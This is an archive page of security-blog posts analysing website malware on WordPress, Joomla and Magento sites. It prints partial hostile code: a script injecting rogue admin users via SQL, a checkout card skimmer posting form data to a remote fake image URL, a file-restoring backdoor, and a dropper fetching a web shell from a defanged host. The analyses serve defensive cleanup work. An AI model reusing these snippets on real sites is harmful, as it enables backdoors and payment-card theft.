Website Malware Infections Archives - Page 23 of 23

Search and Backdoor

The ubiquity of “unlimited” shared hosting platforms has incentivized malware in trying to infect as many adjacent website directories as it can to increase its overall surface area. The more infected the area is, the more likely that at least one piece of malware can evade detection long enough to successfully reinfect the web hosting environment.

When a website is infected or compromised, the malicious user will often times leave a backdoor that can be used to regain unauthorized access to the website or system. A backdoor doesn’t necessarily have to be an existing malicious file; it can also be within a database or running process. A database backdoor could be a shell script included within a row of a table that is loaded on a certain URL. Or in some cases, it can involve an actual user being inserted into a CMS database with full privileges by the malicious user.

I encountered a malicious file that upon execution will go one level above the root of the infected WordPress or Joomla site:

...define('MAX_UP_DIRS' ,10);$counter = 0;while(chdir('..')) {  $counter++;     if($counter > MAX_UP_DIRS) {     break;  }   foreach(glob(getcwd() . '/*') as $file) {      if(strpos($file, 'wp-config.php') !== false      || strpos($file, 'wp-admin') !== false       || strpos($file, 'configuration.php') !== false      || strpos($file, 'administrator') !== false) {           break 2;        }   }}chdir('..');...

From there, it recursively searches all adjacent sites for configuration files.

...foreach ($iter as $path => $dir) {    if ($dir->isDir()) {        $wp_config_file = $path . '/wp-config.php';       $jm_config_file = $path . '/configuration.php';        if(file_exists($wp_config_file)) {         $wp_cfgs[] = $wp_config_file;       }       if(file_exists($jm_config_file)) {          $joomla_cfgs[] = $jm_config_file;       }    }}...

Then it uses information inside the configuration files in order to connect to the database via MySQL and inject a new admin user for all adjacent sites using the following queries:

"INSERT INTO  {$table_prefix}users (ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name) VALUES($user_id,'$user_name',REDACTED,'$user_name','".$user_name."0985488@mailinator.com','201".rand(0,5)."-0".rand(1,9)."-1".rand(1,9)." 12:00:00',0,'$user_name')";"INSERT INTO  {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ($user_id, '{$table_prefix}capabilities', 'a:1:{s:13:"administrator";b:1;}');";"INSERT INTO  {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ($user_id, '{$table_prefix}user_level', 10);";

The source coding also reveals plans to develop the file so that it has capabilities of targeting Joomla installations (i.e $jm_config_file variable and configuration.php file) and inserting their admin user into Joomla database structures. If the hints in the source code weren’t enough, the author even included a notation of their plans:

#TO DO : JOOMLA!!!

In the end, this file helps to show how malicious users try to automate the task of generating backdoors. While the automated creation of an admin user by malware may seem to be relatively simple and crude, it has shown to be effective enough. For that reason it’s not that uncommon when encountering a compromised WordPress, or really any CMS (Content Management System) installation.

If your sites are affected by this or similar malware, please check our guides:

Or sign up for our Website AntiVirus service and we will clean and protect your sites.

Jan 18, 2017 by Luke Leal

Camouflage does not have to be advanced to...

Often times a malware author will try to provide some type of camouflage to their malware’s coding in an effort to disguise an unsuspecting eye from its true intentions. I recently came across an interesting example from a malicious file used to bypass authentication when accessing wp-admin:

If you aren’t familiar with the word “Softaculous”, it is a popular installer for common CMS and other scripts. If you have ever used a “one click install” tool like Fantastico de Luxe or QuickInstall/Mojo Marketplace, then it is similar to that.

I also want to mention that the filename was a random alphanumeric string, so it wasn’t possible to determine the legitimacy through the filename alone. For that reason, we needed to analyze the coding and make our determination through there.

An unsuspecting person may view line 4 and see that it mentions Softaculous. If they used Softaculous before, they may just take a quick glance at the rest of the file. Since Softaculous allows for automatic updates, and users update WordPress through wp-admin, doesn’t it seem reasonable that Softaculous may need to access wp-admin for updates and that’s the purpose of this file?

This is a great example of how the camouflage attempts to trick the user into thinking this is, or might be, just a normal file. Due to this doubt, some users won’t delete the file, leaving it intact (as I am sure many of us have accidentally deleted an important file and know how destructive that can be, especially if you don’t have any backups).

Ultimately the file was not legitimate and was determined to have been maliciously added. It’s what I would call a multi-layer backdoor, as the hacker could also create their own admin user once inside wp-admin so they wouldn’t have to rely on the file being there in the future (though a professional or security-experienced user should know to examine existing users).

If you need any help or have any questions, let us know. 🙂

Jan 12, 2017 by Luke Leal

Database and Image Tricks in Magento Malware

Magento malware that steals details of customer credit cards is a prevalent problem during the last couple of years. We write a lot about various modifications of such malware and the tricks hackers use. When you look back, it’s interesting to see how common ideas may be reused in different steps of the attack.

Database

It’s a common trick to inject malware directly into the Magento database, which helps avoid modification of files on the server. The most typical target is the design/head/includes rows of the core_config_data table. The HTML code from those records is used to build the site pages, so it’s a perfect place for injection of JavaScript code that monitors form input and sends entered data to third-party servers.

Images

Another common theme is using image files to transfer stolen data. Since 2015 (the notorious Visbot malware), we’ve seen many different variations of the server-side malware that would save stolen data in files with image extensions (.jpg, .png, .gif). Files with such extensions raise little suspicion since they are not executable. At the same time, they can be easily downloaded from the compromised sites. Some malware saved the data in plain text. More complex attacks appended the data to existing legitimate image files. Visbot and its "Fake SUPEE-5344 Patch" modification used public keys to encrypt the saved in the .jpg files data, which also helped them make the files look like real binary images.

The "Fake SUPEE-5344 Patch" malware also had a backdoor functionality. It executed arbitrary shell commands passed in the “jpg” request parameter. Apparently, everything related to images is considered benign. Another JavaScript malware sends stolen data to a third-party server, but instead of making a direct AJAX call to that remote URL, it builds an <img> tag with that remote URL as its src parameter. The result is the same, but now it looks as if it’s loading an image from a remote server, not sending data to a remote server.

Recently, we came across a combination of all the above tricks. An obfuscated script was found in the design/footer/absolute_footer row of the core_config_data table.

<script>
this["eval"]("%:){(-7{^-&//`\n5&-8\'2,-{(\':)\'sr \n{{...skipped
...String(A).split("").reverse().join("");return H.charAt(A.indexOf(W))}));
</script>

Once decoded, it was clear that it steals data from Magento checkout pages

if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) { ...

And sends it to a remote hacked site:

...
if(cc.test(snd)){ asd="1" ; } 
var http = new XMLHttpRequest(); 
http.open("POST","https://<hacked-site>/lib/paypal_icon.jpg",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
http.send("data="+snd+"&asd="+asd+"&id_id=infected-site.com"); 
...

The URL of the remote script looks like a URL of an image file: https:///lib/paypal_icon.jpg. One might think that the script loads a PayPal icon for the checkout page. Of course it makes little sense. And when you notice that the script uses the POST method to open that “image” and passes form data as parameters, it becomes clear that paypal_icon.jpg is not an image - it’s a server-side script that pretends to be an image (most likely either using using .htaccess tricks like mod_rewrite or changing the handler and MIME type for the .jpg extension inside the /lib directory).

This malware reminds us once again that we should not trust any code, requests, or files just because they are related (or seem to be related) to images. And don’t limit your malware scans to files on server. Most modern CMS can’t work without a database and the databases are a common target for infections.

For more information about security issues of Magento and other ecommerce platforms, please check the Ecommerce security section of our blog. If you need someone to clean and protect your site, you can count on us.

Jan 10, 2017 by Denis Sinegubko

Spamming Stopped by Pastebin

We wrote multiple times about malware attacks that store their scripts on Pastebin.com and load them either to the server once they break into it or directly to the infected web pages

However Pastebin.com can’t be called a reliable hosting for malware. You can report any paste and it will be removed if Pastebin.com finds it inacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report them.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it and create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, recently our scanner found this file on a hacked site:skin/adminhtml/default/kontools/promailerv2.php.

Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It was indeed removed. We found its original content in Google’s cache. It, as the filename implies, contained the code of a PHP script called “PRO Mailer V2” - a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses. You may help many people. If you ever have a need to publish some malicious (suspicious) code on Pastebin.com or another similar service (e.g. if you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it being used in attacks directly off of Pastebin.com. Also consider making such pastes private and expire in a minimal reasonable time.

If you find the "Pastebin.com - Page Removed" files on your server, it’s a strong indication of a hack and you should investigate this issue. Let us know if you need a professional help.

Jan 6, 2017 by Denis Sinegubko

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions and much more. If they happen to find any of those instances, it’s a common practice to either remove or rename the file in question.

If the file being flagged hits a certain amount of suspicious code or raises red flags based on different variables, hosting companies may rename those files from file.php to file.php.suspected (Appending .suspected in the end) - this way the file loses its ability to be interpreted by the webserver. However, sometimes there are backdoors nearby ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

Very short, but interesting snippet that checks if the file wp-rmcc.php.suspected exists. If it does, the code changes its permission to 777 and renames it to wp-rmcc.php, therefore allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the permissions for the file read-only to prevent easy removal of the malicious code. Of course the example above is very simple and targeted to only that particular file, but the script could be easily modified to rename all files with the .suspected extension.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website by having those other small infected files around, even if the obvious backdoor is renamed/blocked. That’s why simply renaming those easy to spot malicious files may not solve the case.

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Jan 3, 2017 by Andrey Kucherov

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.

One of the techniques they use to increase those odds, is injecting a file known as Dropper that downloads the real malware into the system. The Dropper could go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system as you can see in the snippet below:

<?php
if( $z = fopen( 'include4.php', 'w') ) {
 if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
 fclose( $z );
 echo '0';
 } else {
 echo '1';
 }
} else {
 echo '2';
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as a result of the request. - the well known exit code in UNIX systems for successful execution of command. If the operation can’t download the webshell, it prints 1; if it can’t create the file in which the shell will resides it prints 2.

The following code is the content of the webshell fetched from the 'hxxttp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

Dec 29, 2016 by Yuliyan Tsvetkov